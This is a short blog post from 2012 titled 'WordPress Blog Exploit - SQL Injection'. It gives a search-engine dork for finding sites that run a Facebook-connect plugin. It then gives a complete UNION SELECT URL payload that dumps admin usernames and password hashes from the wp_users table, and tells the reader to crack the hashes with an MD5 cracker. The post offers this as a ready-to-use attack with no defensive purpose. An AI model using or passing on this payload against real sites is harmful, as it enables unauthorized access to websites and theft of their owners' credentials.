Thứ Sáu, 15 tháng 6, 2012

WordPress Blog Exploit - SQL Injection

Dork: inurl:"fbconnect_action=myhome"



You will be get such info of admin on page



Just change this part of URL :
?fbconnect_action=myhome&userid=

With This part of URL :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--



Now You will be get Username and Password of Admin

Than Just Encrypt Password In any MD5 Cracker

Không có nhận xét nào: